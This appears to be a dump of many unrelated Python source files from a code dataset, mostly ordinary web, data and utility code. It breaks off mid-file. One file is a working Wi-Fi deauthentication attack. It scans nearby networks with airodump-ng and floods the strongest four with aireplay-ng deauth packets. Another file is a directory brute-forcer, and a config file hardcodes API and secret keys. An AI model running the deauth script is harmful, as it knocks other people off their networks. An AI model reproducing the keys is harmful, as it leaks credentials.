text stringlengths 38 1.54M |
|---|
class TestMigrations:
def test_alembic(self, tmp_path):
from sqlalchemy import create_engine
from spellbot import get_db_url
from spellbot.data import create_all, reverse_all
db_file = tmp_path / "spellbot.db"
connection_string = f"sqlite:///{db_file}"
db_url = get_db_url("TEST_SPELLBOT_DB_URL", connection_string)
engine = create_engine(db_url)
connection = engine.connect()
create_all(connection, db_url)
reverse_all(connection, db_url)
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.contrib.auth import logout as logout_user
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth import login
from .models import Travel, TravelPlaceKeeper , TravelType
# Create your views here.
def contact(req):
return render(req, 'myweb/contact.html')
def home(req):
return render(req, 'myweb/home.html')
def admins(req):
return render(req, 'myweb/admins.html')
def index(req):
return render(req, 'myweb/index.html')
def user(req):
showtravel = Travel.objects.all()
showtravel1 = TravelPlaceKeeper.objects.all()
return render(req, 'myweb/user.html',{'showtravel':showtravel,'showtravel1':showtravel1})
def logins(req):
return render(req, 'myweb/logins.html')
def traveldo(req):
return render(req, 'myweb/traveldo.html')
def sign_up(request):
context = {}
form = UserCreationForm(request.POST or None)
if request.method == "POST":
if form.is_valid():
user = form.save()
login(request,user)
return redirect('logins')
context['form']=form
return render(request,'myweb/sign_up.html',context)
|
import sqlite3
from Updater import run_updater
print("\t \t \t \t Update your spendings here _|_ \t \t \t \t")
dict = {}
date = str(input("Enter the date in YY-mm-dd format : "))
dict["DATE"] = date
db_loc = r'C:\Users\chand\Documents\P\Projects\Locally_personalised_ads\db\payment_db.db'
table_name_1 = "tab1"
# Getting the last row from the db
command = "SELECT * FROM {} ".format(table_name_1)
command += "ORDER BY ID "
command += "DESC LIMIT 1 ;"
conn = sqlite3.connect(db_loc)
curser = conn.execute(command)
names = [description[0] for description in curser.description]
for col in names[2:] :
print()
dict[col] = float(input("Enter how much did you spend in {} category : ".format(col)))
conn.close()
for col in dict.keys():
print()
print("You have entered {} for {}".format(dict[col], col))
print("\t \t \t \t Updating -|- \t \t \t \t")
run_updater(dict) |
from nltk.corpus import gutenberg, nps_chat
import nltk
moby = nltk.Text(gutenberg.words('melville-moby_dick.txt'))
print(moby.findall(r"<a><.*><man>"))
print(moby.findall(r"<a>(<.*>)<man>"))
chat = nltk.Text(nps_chat.words())
print(chat.findall(r"<l.*>{3,}")) |
# coin_key = "35ad627a-d583-4961-828e-36eead5e8e3b"
coin_key = "9188e46a-558a-4d2c-8496-21c9719ec1d2"
secret_key = "235 h sdblfgghf__aghg9843ty fmsa"
DATABASE = "data/movimientos.db" |
"""
Извлекаем из файла images.json вытащенные из гугл-таблицы
со статистикой урлы-ссылки на эскизы и сохраняем их в базе.
"""
import json
import os
import django
os.environ['DJANGO_SETTINGS_MODULE'] = 'edu_test.settings'
django.setup()
from .models import Student, Task, Image
with open('images.json', 'r') as f:
data = json.load(f)
for task, answers in data.items():
find_task = Task.objects.get(lesson__module__name="Информационные ожидания", number=task)
print(find_task)
for answer in answers:
student, create = Student.objects.get_or_create(email=answer[0][0])
print(student)
for im in answer[1]:
print(im)
image = Image.objects.create(student=student, task=find_task, url=im) |
from flask import Flask, render_template,request
#import flask_mysqldb
#from flask_mysqldb import MySQL
from similar import similar, similar_papers
import pandas as pd
app = Flask(__name__)
data = pd.read_csv("cite_updated.csv")
@app.route("/")
def home():
return render_template("home.html")
@app.route('/results',methods = ['POST', 'GET'])
def result():
if request.method == 'POST':
keyword = request.form['keyword']
keyword= keyword.lower()
index,result,author = similar(keyword)
return render_template("results.html",keyword = keyword ,result = result, index = index,author = author)
@app.route('/recommend',methods = ['POST', 'GET'])
def recommend():
index = request.args.get('index')
title = data.loc[int(index)].title
recommended,titles,authors = similar_papers(title)
print(title,recommended)
return render_template("results.html",keyword = title ,result = titles, index = recommended,author = authors)
if __name__ == "__main__":
app.run(debug=True)
app.static_folder = 'static'
|
str = "a b\t c \nd"
print(str)
list = str.split()
print(list)
result = "\n".join(list)
print(result)
|
import torch
import torchvision
import numpy as np
import matplotlib.pyplot as plt
import os
def batch_transform(batch, transform):
"""把一个batch的样本应用于transform
Args:
batch (): a batch的样本
transform (callable):用来转换batch samples的 function/transform
"""
# 以tensor形式将单通道标签转换为RGB
# 1. torch.unbind删除"标签"的0维,并返回沿该维度的所有slice的元组
# 2. transform作用于每个slice
transf_slices = [transform(tensor) for tensor in torch.unbind(batch)]
return torch.stack(transf_slices)
def imshow_batch(images, labels):
"""显示两个图像网格,顶部网格显示"image"和底部网格"label"
Args:
images ("Tensor"): a 4D mini-batch tensor,shape 是 (B, C, H, W)
- labels ("Tensor"): a 4D mini-batch tensor, shape 是 (B, C, H, W)
"""
# 使用image和label制作网格并将其转换为numpy
images = torchvision.utils.make_grid(images).numpy()
labels = torchvision.utils.make_grid(labels).numpy()
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(15, 7))
ax1.imshow(np.transpose(images, (1, 2, 0)))
ax2.imshow(np.transpose(labels, (1, 2, 0)))
plt.show()
def save_checkpoint(model, optimizer, epoch, miou, args):
"""指定文件夹和名字存储模型文件
Args:
model ("nn.Module"): model
optimizer ("torch.optim"): 存储的优化器.
epoch ("int"): The current epoch for the model.模型的当前epoch
miou ("float"): 由model获得的mean IoU
args ("ArgumentParser"): ArgumentParser的一个实例,包含用于训练model的参数。 参数被写入名为"args.name"_args.txt"的"args.save_dir"中的文本文件。
"""
name = args.name
save_dir = args.save_dir
assert os.path.isdir(
save_dir), "The directory \"{0}\" doesn't exist.".format(save_dir)
# Save model
model_path = os.path.join(save_dir, name)
checkpoint = {
'epoch': epoch,
'miou': miou,
'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict()
}
torch.save(checkpoint, model_path)
# Save arguments
summary_filename = os.path.join(save_dir, name + '_summary.txt')
with open(summary_filename, 'w') as summary_file:
sorted_args = sorted(vars(args))
summary_file.write("ARGUMENTS\n")
for arg in sorted_args:
arg_str = "{0}: {1}\n".format(arg, getattr(args, arg))
summary_file.write(arg_str)
summary_file.write("\nBEST VALIDATION\n")
summary_file.write("Epoch: {0}\n". format(epoch))
summary_file.write("Mean IoU: {0}\n". format(miou))
def load_checkpoint(model, optimizer, folder_dir, filename):
"""使用指定的name.save将model保存在指定的目录中,load checkpoint
Args:
model ("nn.Module"): 存储的模型状态将复制到此模型实例
optimizer ("torch.optim"): 存储的optimizer程序状态将复制到此optimizer程序实例.
folder_dir ("string"): 保存的model state 所在文件夹的路径。
filename ("string"): 模型文件名
Returns:
返回从checkpoint中加载的epoch, mean IoU, "model", 和 "optimizer"
"""
assert os.path.isdir(
folder_dir), "The directory \"{0}\" doesn't exist.".format(folder_dir)
# 创建文件夹来存储model和information
model_path = os.path.join(folder_dir, filename)
assert os.path.isfile(
model_path), "The model file \"{0}\" doesn't exist.".format(filename)
print("加载已经存储的模型")
# 加载已经存储的模型参数到model instance
checkpoint = torch.load(model_path)
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
epoch = checkpoint['epoch']
miou = checkpoint['miou']
return model, optimizer, epoch, miou
|
from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from rest_framework.test import APIClient
from rest_framework import status
RESTAURANT_URL = reverse("user:restaurant")
CREATE_RESTAURANT_URL = reverse("user:createrestaurant")
def create_user(**params):
return get_user_model().objects.create_user(**params)
class PublicRestaurantTests(TestCase):
def test_retrieve_restaurant_unauthorized(self):
"""Test that authentication is required for users"""
res = self.client.get(RESTAURANT_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
def test_create_valid_restaurant_success(self):
"""Test creating restaurant with valid payload is successful"""
payload = {
"email": "test@gmail.com",
"password": "testpass",
"name": "Test Name"
}
res = self.client.post(CREATE_RESTAURANT_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
user = get_user_model().objects.get(**res.data)
self.assertTrue(user.check_password(payload["password"]))
self.assertNotIn("password", res.data)
def test_restaurant_exists(self):
"""Test restaurant already exists fail"""
payload = {"email": "test@gmail.com", "password": "testpass"}
create_user(**payload)
res = self.client.post(CREATE_RESTAURANT_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_password_too_short(self):
"""Test that the password must be more than 5 characters"""
payload = {"email": "test@gmail.com", "password": "pw"}
res = self.client.post(CREATE_RESTAURANT_URL, payload)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
user_exists = get_user_model().objects.filter(
email=payload["email"]
).exists()
self.assertFalse(user_exists)
def test_non_restaurant_can_not_see_page(self):
"""Test that not restaurant can't see the restaurant page"""
self.user = create_user(
email="test@gmail.com",
password="testpass",
name="name",
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
res = self.client.get(RESTAURANT_URL)
self.assertEqual(res.status_code, status.HTTP_403_FORBIDDEN)
class PrivateEmployeeTests(TestCase):
"""Tests for restaurant users"""
def setUp(self):
self.user = create_user(
email="test@gmail.com",
password="testpass",
name="name",
is_restaurant=True
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_profile_success(self):
"""test retrieving profile for logged in restaurant"""
res = self.client.get(RESTAURANT_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, {
"name": self.user.name,
"email": self.user.email,
"is_employee": self.user.is_employee,
"is_restaurant": self.user.is_restaurant,
})
def test_post_me_not_allowed(self):
"""Test that post is not allowed on the restaurant url"""
res = self.client.post(RESTAURANT_URL, {})
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_user_profile(self):
"""Test updating the restaurant profile for authenticated restaurant"""
payload = {"name": "new name", "password": "newpassword213"}
res = self.client.patch(RESTAURANT_URL, payload)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload["name"])
self.assertTrue(self.user.check_password(payload["password"]))
self.assertEqual(res.status_code, status.HTTP_200_OK)
|
import requests
import argparse
import threading
def logo():
print("""
\x1b[32m
____ _ _ ____ _
| __ )| | __ _ ___| | _| _ \(_)_ __
| _ \| |/ _` |/ __| |/ / | | | | '__|
| |_) | | (_| | (__| <| |_| | | |
|____/|_|\__,_|\___|_|\_\____/|_|_| version:0.2
==================================================
C0ded By RedVirus[@redvirus0]
Group:BlackPearl[@bp.team]
Site:blackpearl.team
==================================================
BlackDir.py --url : url to find Directory
BlackDir.py --list : if you have list
ex:
BlackDir.py --list /root/Desktop/list.txt --url http://google.com
""")
def Dir(url,list):
for i in list:
i = i.strip()
Purl = url+"/"+i
response = requests.get(Purl,data=None)
if response.status_code == 200:
print("\x1b[32mFound[+]")
print(Purl)
else:
pass
parser = argparse.ArgumentParser("Find Directory")
parser.add_argument("-url","--url")
parser.add_argument("-list","--list")
args = parser.parse_args()
listuser = args.list
if listuser != None:
lists = open(listuser,"r")
else:
lists = open("list.txt","r")
url = args.url
thred = threading.Thread(target=Dir,args=(url,lists))
if args.url == None:
logo()
else:
print("\x1b[32mPlease wait we find Directory .. ")
thred.start()
|
from bref_feature_engineering.rollingavg_seasonlog_teamrecord import teamrecord
from bref_feature_engineering.proportion_ip_available import get_games_played, append_proportion_ip_avail
celtics_17 = teamrecord("Boston Celtics", 2017)
append_proportion_ip_avail(celtics_17, "Boston Celtics")
print(celtics_17) |
import os
import sys
import struct
import collections
import argparse
from os.path import exists, join, relpath, isdir
from contextlib import contextmanager
from typing import Tuple, List
from . import mod
from . import uassetz
MOD_APPID = "346110"
DEFAULT_MOD_STORAGE_DIR = "steamapps/workshop/content/" + MOD_APPID
# Modids here should be ignored by "install"/"remove".
# This overrides mod name if set when calling "list".
OVERRIDE_MODIDS = {
"111111111": "Primitive+ (official)" # This is a special flower.
}
# Helper functions ###########################################################
@contextmanager
def ctxchdir(path):
cur = os.getcwd()
try:
yield os.chdir(path)
finally:
os.chdir(cur)
def ark_platform() -> str:
things = os.listdir("ShooterGame/Binaries")
if "Win64" in things and "Linux" not in things:
return "Win64"
elif "Mac" in things and "Linux" not in things:
return "Mac"
return "Linux"
def is_dedicated() -> bool:
# check for the existance of the server executable,
# and the absence of the client executable.
plat = ark_platform()
if plat.startswith("Win"):
ext = ".exe"
else:
ext = ""
sv_exec = exists("ShooterGame/Binaries/" + plat + "/ShooterGameServer" + ext)
cl_exec = exists("ShooterGame/Binaries/" + plat + "/ShooterGame" + ext)
return sv_exec and not cl_exec
def rm(filep, verbose=False):
if verbose:
print("removing '%s'" % (filep))
os.unlink(filep)
def recrm(direc, verbose=False):
for dirpath, dirnames, filenames in os.walk(direc, topdown=False, followlinks=False):
for dirname in dirnames:
dirname = join(dirpath, dirname)
if verbose:
print("removing '%s'" % filename)
os.rmdir(dirname)
for filename in filenames:
filename = join(dirpath, filename)
if verbose:
print("removing '%s'" % filename)
os.unlink(filename)
if verbose:
print("removing '%s'" % direc)
os.rmdir(direc)
#################
# CLI functions #
#################
def modtool(args):
# Make storage dir relative to ark root
args.mod_storage_dir = relpath(args.mod_storage_dir, args.ark_root)
# Change to ark root dir.
os.chdir(args.ark_root)
# Resolve mod_platform
# Note: ark dedicated servers seem to need the Windows versions of mod files.
if args.mod_platform is None:
platform = ark_platform()
if platform == "Linux" and not is_dedicated():
args.mod_platform = "LinuxNoEditor"
elif platform == "Mac" and not is_dediated():
args.mod_platform = "MacNoEditor" # XXX: Pure guess.
else:
args.mod_platform = "WindowsNoEditor"
return args.mod_func(args)
# Mod installation ###########################################################
def do_mod_install(modid: str, mod_storage_dir: str, mod_platform: str):
storage_path = join(mod_storage_dir, modid, mod_platform)
install_path = join(mod.MOD_LOCATION, modid)
if exists(install_path + ".mod"):
print("mod {0} already installed.".format(modid))
return
os.mkdir(install_path)
for sdir_path, dirnames, filenames in os.walk(
storage_path,
followlinks=True
):
idir_path = join(install_path, relpath(sdir_path, storage_path))
for dirname in dirnames:
os.mkdir(join(idir_path, dirname))
for filename in filenames:
if filename.endswith(".uasset.z.uncompressed_size"):
continue
slcidx = -2 if filename.endswith(".uasset.z") else None
srcpath = join(sdir_path, filename)
dstpath = join(idir_path, filename[:slcidx])
with open(srcpath, "rb") as src, open(dstpath, "wb") as dst:
if filename.endswith(".uasset.z"):
uassetz.decompress(src, dst)
else:
dst.write(src.read())
mip = join(install_path, "mod.info")
with open(mip, "rb") as mif:
mi = mif.read()
mmip = join(install_path, "modmeta.info")
if exists(mmip):
with open(mmip, "rb") as mmif:
mmi = mmif.read()
else:
mmi = None
mf = mod.ark_gen_modfile(modid, mi, mmi)
with open(install_path + ".mod", "wb") as modf:
modf.write(mf)
print("installed {0}".format(modid))
def mod_install(args):
if len(args.modid) == 0:
print("no modids specified!")
return 1
for modid in args.modid:
if modid in OVERRIDE_MODIDS:
print("ignoring special modid %s" % modid)
continue
do_mod_install(modid, args.mod_storage_dir, args.mod_platform)
# Mod removal ################################################################
def do_mod_remove(modid: str):
instpath = join(mod.MOD_LOCATION, modid)
if os.path.exists(instpath + ".mod"):
rm(instpath + ".mod")
if os.path.isdir(instpath):
recrm(instpath)
def mod_remove(args):
if len(args.modid) == 0:
print("no modids specified!")
return 1
for modid in args.modid:
if modid in OVERRIDE_MODIDS:
print("ignoring special modid %s" % modid)
continue
do_mod_remove(modid)
return 0
# Mod upgrading ##############################################################
def mod_chsuffix(modid: str, cursfx: str="", tarsfx: str=""):
with ctxchdir(mod.MOD_LOCATION):
if exists(modid + ".mod" + cursfx):
os.rename(modid + ".mod" + cursfx, modid + ".mod" + tarsfx)
os.rename(modid + cursfx, modid + tarsfx)
def do_mod_upgrade(modid: str, mod_storage_dir: str, mod_platform: str):
print("renaming old mod files...")
mod_chsuffix(modid, tarsfx=".bak")
print("installing mod...")
do_mod_install(modid, mod_storage_dir, mod_platform)
def mod_upgrade(args):
if len(args.modid) == 0:
print("no modids specified!")
return 1
for modid in args.modid:
if modid in OVERRIDE_MODIDS:
print("ignoring special modid %s" % modid)
continue
do_mod_upgrade(modid, args.mod_storage_dir, args.mod_platform)
return 0
# Mod listing ################################################################
def mod_list(args):
class ModEntry:
__slots__ = ["storage_dir", "install_dir"]
def __init__(self):
self.storage_dir = None
self.install_dir = None
def modinfo_strings(path: str, statsym: str):
if path is None:
return " ", None
try:
with open(join(path, "mod.info"), "rb") as mif:
mi = mod.ark_unpack_mod_info(mif.read())
return statsym, mi.mod_name.decode("utf8")
except (IOError, struct.error) as err:
print("error: " + str(err), file=sys.stderr)
return "!", None
mods = collections.defaultdict(ModEntry)
if isdir(args.mod_storage_dir):
for modid in os.listdir(args.mod_storage_dir):
if not modid.isnumeric():
continue
if len(args.modid) > 0 and modid not in args.modid:
continue
sdir = join(args.mod_storage_dir, modid)
if len(os.listdir(sdir)) == 0:
continue
mods[modid].storage_dir = sdir
if isdir(mod.MOD_LOCATION):
for modid in os.listdir(mod.MOD_LOCATION):
if not modid.isnumeric():
continue
if len(args.modid) > 0 and modid not in args.modid:
continue
mods[modid].install_dir = join(mod.MOD_LOCATION, modid)
modids = sorted(mods.keys(), key=int)
if len(modids) < 1:
print("no mods to show.")
return 0
padding = len(modids[-1])
for modid in modids:
ent = mods[modid]
# output format: [di] <modid> name (downloded, installed)
sq, sname = modinfo_strings(ent.storage_dir, "s")
iq, iname = modinfo_strings(ent.install_dir, "i")
# name printing logic:
# OVERRIDE_MODIDS? -> use that one.
# both none? -> "(unknown)"
# one none? -> the one that isn't.
# both not none?
# are they equal? -> no choice needed.
# else, if not? -> display both
if modid in OVERRIDE_MODIDS:
modname = OVERRIDE_MODIDS[modid]
elif sname is None or iname is None:
modname = sname or iname or "(unknown)"
elif sname == iname:
modname = iname
else:
modname = "installed: {0}, stored: {1}.".format(iname, sname)
print("[{s}{i}] {mi: >{pad}} {mn}".format(
pad=padding,
s=sq,
i=iq,
mi=modid,
mn=modname
))
return 0
def tool_argparse(parser):
parser.add_argument("-r", "--ark-root", dest="ark_root", action="store", default="./")
parser.add_argument("-m", "--mod-storage", dest="mod_storage_dir", action="store", default=DEFAULT_MOD_STORAGE_DIR)
parser.add_argument("-p", "--mod-platform", dest="mod_platform", action="store", choices={"LinuxNoEditor", "WindowsNoEditor"}, default=None)
parser.set_defaults(func=modtool, mod_func=mod_list, modid=[])
spo = parser.add_subparsers()
lstp = spo.add_parser("list", aliases=["ls"])
lstp.add_argument(dest="modid", action="store", nargs="*")
lstp.set_defaults(mod_func=mod_list)
insp = spo.add_parser("install", aliases=["ins"])
insp.add_argument(dest="modid", action="store", nargs="*")
insp.set_defaults(mod_func=mod_install)
remp = spo.add_parser("remove", aliases=["rm"])
remp.add_argument(dest="modid", action="store", nargs="*")
remp.set_defaults(mod_func=mod_remove)
updp = spo.add_parser("upgrade", aliases=["up"])
updp.add_argument(dest="modid", action="store", nargs="*")
updp.set_defaults(mod_func=mod_upgrade)
def main():
parser = argparse.ArgumentParser()
tool_argparse(parser)
args = parser.parse_args()
return args.func(args)
if __name__ == "__main__":
sys.exit(main())
|
from GeneralPythonCopy.General import General
'''
Process for User uploading data:
1. User: uploads files to Website and chooses the y_variable for the regression (discrete occurance) [views.py]
2. Backend: uploaded files go to uploaded_files along with a txt file with the specified y_variable which is accessible to the Web App py files [views.py]
3. Backend: performs gp_symbolic_regression on the information uploaded (discrete occurance) [views.py]
4. Backend: uploads equation results to equations database (discrete occurance) [views.py]
5. Backend: creates complete structures out of the equations database whenever the database is updated (discrete occurance) [views.py]
6. Backend: for each key in complete_structures resultant dictionary:
static_causal_order(5) (discrete occurance)
9. Backend: initialize_mini_network(5, 7, name)
if the name (of the network) already exists, modify_mini_network(5, 7, prev_network gexf graph, name) (discrete occurance)
10. Backend: build_causal_network() (discrete occurance)
11. Backend: when the AI is finished using the User's uploaded files, the AI deletes the files from the uploaded_files directory
Process for User performing a simulation
1. User: chooses equation name from menu; chooses variable from selected equation; inputs variable values of the equation; selects target variable from menu (discrete occurance)
2. Backend:
Process for User performing an optimization
1. User: chooses an equation name from menu; chooses variable from selected equation; chooses objective to min or max; inputs contraints; inputs variable bounds;
inputs initial condition (discrete occurance)
2. Backend:
''' |
import numpy # we import the array library
from matplotlib import pyplot # import plotting library
myarray = numpy.linspace(4, 5, 2)
print(myarray)
a = 5 #a is an integer 5
b = 'five' #b is a string of the word 'five'
c = 5.0 #c is a floating point 5
print(type(a))
print(type(b))
print(type(c))
for i in 'abcd':
print("Hi \n")
for i in range(3):
for j in range(3):
print(i, j)
print("This statement is within the i-loop, but not the j-loop")
myvals = numpy.array([1, 2, 3, 4, 5])
print(myvals)
print(myvals[0], myvals[4]) |
from app_instance import app
from umongo import Document
from umongo.fields import StringField, IntegerField, ListField
@app.lazy_umongo.register
class Movies(Document):
name = StringField(required=True, allow_none=False)
popularity = IntegerField()
director = StringField(required=True, allow_none=False)
genre = ListField(StringField(required=True, allow_none=False))
imdb_score = IntegerField()
movie_id = StringField(required=True, allow_none=False)
insert_datetime = StringField(required=True, allow_none=False)
update_datetime = StringField(required=True, allow_none=True)
def pre_delete(self):
print("Pre delete called")
@app.lazy_umongo.register
class Users(Document):
username = StringField(required=True, allow_none=False)
password = StringField(required=True, allow_none=False)
role = StringField(required=True, allow_none=False)
|
#!/usr/bin/env python
#--------Include modules---------------
from copy import copy
import rospy
from visualization_msgs.msg import Marker
from std_msgs.msg import String
from geometry_msgs.msg import Point
from nav_msgs.msg import OccupancyGrid
from os import system
from random import random
from numpy import array
from numpy import concatenate
from numpy import vstack
from numpy import delete
from numpy import linalg as LA
from functions import Nearest
from functions import Steer
from functions import Near
import parameters as param
from functions import ObstacleFree
from functions import Find
from functions import Cost
from functions import prepEdges
from numpy import all as All
def callback(data):
rospy.loginfo(rospy.get_caller_id() + "I heard %s", data.data)
def node():
rospy.Subscriber("map", OccupancyGrid, callback)
rospy.init_node('testNode', anonymous=False)
rate = rospy.Rate(1)
#-------------------------------RRT------------------------------------------
while not rospy.is_shutdown():
rate.sleep()
#_____________________________________________________________________________
if __name__ == '__main__':
try:
node()
except rospy.ROSInterruptException:
pass
|
import random
from ac_flask.hipchat import Addon, room_client, addon_client, sender, context
from ac_flask.hipchat.glance import Glance
from flask import Flask
addon = Addon(app=Flask(__name__),
key="test-addon",
name="Test AddOn",
allow_room=True,
scopes=['send_notification', 'view_room'])
@addon.configure_page()
def configure():
return "hi"
@addon.webhook(event="room_enter")
def room_entered():
room_client.send_notification('hi: %s' % sender.id)
return '', 204
@addon.webhook(event='room_message', pattern='^/update')
def room_message():
label = 'Update count: {}'.format(random.randint(1, 100))
glance_data = Glance().with_label(label).with_lozenge('progress', 'current').data
addon_client.update_room_glance('glance.key', glance_data, context['room_id'])
return '', 204
@addon.glance(key='glance.key', name='Glance', target='webpanel.key', icon='static/glance.png')
def glance():
label = 'Update count: {}'.format(random.randint(1, 100))
return Glance().with_label(label).with_lozenge('progress', 'current').data
@addon.webpanel(key='webpanel.key', name='Panel')
def web_panel():
return "This is a panel"
if __name__ == '__main__':
addon.run(host="0.0.0.0") |
# Copyright 2022 The HuggingFace Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from stable_baselines3 import PPO
import simulate as sm
from simulate.assets.action_mapping import ActionMapping
# This example adds an impressive recreation of the mountain car Gym environment
def add_rl_components_to_scene(scene):
actor = scene.Cart
actor.is_actor = True
# Add action mappings, moving left and right
mapping = [
ActionMapping("add_force", axis=[1, 0, 0], amplitude=300),
ActionMapping("add_force", axis=[-1, 0, 0], amplitude=300),
]
actor.actuator = sm.Actuator(mapping=mapping, n=2)
# Add rewards, reaching the top of the right hill
reward_entity = sm.Asset(name="reward_entity", position=[-40, 21, 0])
scene += reward_entity
reward = sm.RewardFunction(entity_a=reward_entity, entity_b=actor)
actor += reward
# Add state sensor, for position of agent
actor += sm.StateSensor(target_entity=actor, properties=["position"])
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--build_exe", help="path to unity engine build executable", required=False, type=str, default=""
)
parser.add_argument("-n", "--n_frames", help="number of frames to simulate", required=False, type=int, default=30)
args = parser.parse_args()
build_exe = args.build_exe if args.build_exe != "None" else None
scene = sm.Scene.create_from("simulate-tests/MountainCar/MountainCar.gltf", engine="unity", engine_exe=build_exe)
add_rl_components_to_scene(scene)
env = sm.RLEnv(scene)
model = PPO("MultiInputPolicy", env, verbose=3, n_epochs=2)
model.learn(total_timesteps=10000)
|
#jam
import sys,os,platform
import time
import subprocess
import multiprocessing
import threading
import pandas as pd
#subprocess.call(["python3","test.py"])
#abc=subprocess.check_output(["python3","test.py"])
# print("abc")
# lists=subprocess.Popen(["python3","test.py"],stdout=subprocess.PIPE)
# try:
# abc=lists.communicate(timeout=2)
# except subprocess.TimeoutExpired:
# lists.kill()
# abc=lists.communicate()
# print(abc)
def find_interface():
moni=subprocess.Popen(['iwconfig'],text=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
all_infac,err=(moni.communicate())
wireless_inter=all_infac.split("\n")[0].split()[0]
return wireless_inter
def start_monitorMode():
IFace=find_interface()
# act_Mon1_string="sudo ip link set "+IFace+" down"
# act_Mon2_string="sudo iw "+IFace+" set monitor control"
# act_Mon3_string="sudo ip link set "+IFace+" up"
# cmd1=subprocess.Popen(act_Mon1_string.split(" "),)
# cmd2=subprocess.Popen(act_Mon2_string.split(" "),)
# cmd3=subprocess.Popen(act_Mon3_string.split(" "),)
#
# print("\t\t\tShould disabled network Manager \nPress y/n (yes/no)")
# x=input()
# if(x=='y'):
# dis_networkManager_string="service NetworkManager stop"
# # cmd4=subprocess.Popen(act_Mon3_string.split(" "),)
# else:
# print("Cant continue with out disabling network")
act_mon="sudo airmon-ng start "+IFace
cmd_start_mon=subprocess.Popen(act_mon.split(" "),text=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
cmd_start_mon.wait()
cmd_start_mon.terminate()
# print(get_InterFace)
def getting_bssid():
InterFace=find_interface()
act_bssid="timeout 9s airodump-ng -w out --output-format csv "+InterFace
print(act_bssid.split())
try:
cmd_bssid = subprocess.run(
act_bssid.split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE,check=True,timeout=10,)
except subprocess.TimeoutExpired:
# Handle exception
print("sucessfull data")
read_file = pd.read_csv('./out-01.csv')
read_file = read_file.sort_values(" Power",ascending = False,)
read_file = read_file.loc[(read_file[" Power"]<=-10) & (read_file[" Power"]>=-80)]
bssids = read_file.loc[:,['BSSID',' channel',' ESSID',' Power']]
bssids = bssids.dropna()
print(bssids)
return bssids,InterFace
def deauth_one(BSSID,InterFace):
cmd_deauth="aireplay-ng --deauth 10 -a "+ BSSID +" "+InterFace
print(cmd_deauth.split(" "))
process_deauth = subprocess.Popen(cmd_deauth.split(" "),stdout=subprocess.PIPE, stderr=subprocess.PIPE,)
stdout,stderr = process_deauth.communicate()
print(stdout)
print("output")
def deauth_all(bssids,InterFace):
all_process=[]
for i in range(4):
process = multiprocessing.Process(target=deauth_one ,args=(bssids.iloc[i,0],InterFace))
process.start()
all_process.append(process)
for p in all_process:
p.join()
pass
def medula():
print("medu the wifi y/n")
x=input()
if(x=="y"):
start_monitorMode()
bssids,InterFace=getting_bssid()
deauth_all(bssids,InterFace)
print("yahooo")
else:
medula()
system_os=platform.system()
print(system_os)
if system_os == 'Linux':
medula()
else:
print('no')
# str=subprocess.run(["ls","-al"],capture_output=True,text=True)
# print(str.stdout.split("\n"))
|
from sys import argv, exit
from Tkinter import Tk
try:
tkObj = Tk()
except Exception as e:
print "Failed to create the Tkinter object: " + str(e)
cssPath = tkObj.clipboard_get()
print "The CSS path retrieved from your clipboard is:\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n" + str(cssPath)
#if len(argv)!=2:
# exit("Something went wrong! Give CSS Path as an argument enclused in quotes")
#if argv[1]=="" or len(argv[1])<10:
# exit("Are you sure the CSS Path is corect?")
#cssPath = argv[1]
# List of symbols, tags and elements to remove from the CSS path
graveList = [" >", ".ng-scope", ".ng-isolate-scope", ".ng-include", ".ng-view", ".ng-animate"]
for mark in graveList:
cssPath = cssPath.replace(mark,"")
print "\n\nThe modified CSS path sent to your clipboard is:"
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print cssPath
tkObj.clipboard_clear()
tkObj.clipboard_append(cssPath)
|
#
# @lc app=leetcode.cn id=77 lang=python3
#
# [77] 组合
#
class Solution:
def combine(self, n: int, k: int) -> List[List[int]]:
res = []
self.dfs(n,k,1,[],res)
return res
def dfs(self,n,k,start,path,res):
if k == 0 and path not in res:
res.append(path)
return
for i in range(start,n+1):
self.dfs(n,k-1,i+1,path+[i] ,res)
|
class Node:
def __init__(self, value, next=None):
self.value = value
self.next = next
class LinkedList:
def __init__(self):
self.head = None
def listprint(self):
head = self.head
while head is not None:
print(head.value)
head = head.next
def reverse(self):
previous_node = None
current_node = self.head
while current_node is not None:
next_node = current_node.next
current_node.next = previous_node
previous_node = current_node
current_node = next_node
self.head = previous_node
self.listprint()
s_linked_list = LinkedList()
node1 = Node("Mon")
node2 = Node("Tue")
node3 = Node("Wed")
s_linked_list.head = node1
s_linked_list.head.next = node2
node2.next = node3
s_linked_list.listprint()
print('Reverse list:')
s_linked_list.reverse()
|
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from apps.lib.template import render_to
from .item import generate_thumbnail_of_item
from .models import Item
@render_to('recent.html')
def recent(request):
